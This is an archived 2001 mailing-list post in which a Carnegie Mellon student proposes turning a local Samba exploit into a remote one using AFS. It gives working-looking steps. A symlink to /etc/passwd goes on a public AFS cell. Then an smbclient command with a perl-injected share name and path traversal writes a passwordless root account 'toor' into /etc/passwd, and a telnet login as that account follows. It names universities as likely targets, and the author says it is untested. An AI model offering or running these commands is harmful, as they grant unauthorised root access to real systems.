I was hoping to test this out but haven't been able to so here goes on theoretical... How to make this exploit a remote one using AFS or other remote file systems. What does this exploit need on the remote side?? A symlink; soo... on a AFS system ,preferably one of a well known node that most AFS servers would have in their CellServDB such as andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named x.log like ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log now make the symlink world readable... then all you need is UNIXes running samba in the vulnerable configuration and running AFS. smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N telnet afs.machine login as toor if root logins aren't allowed make a dummy account first, login with that then make a toor account ontop of that and su over to toor. what machines does this really effect? Those running samba and AFS, mainly educational institutions or other large institutions. Christopher Palow palowat_private Senior Electrical and Computer Engineering Carnegie Mellon University
This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 14:23:11 PDT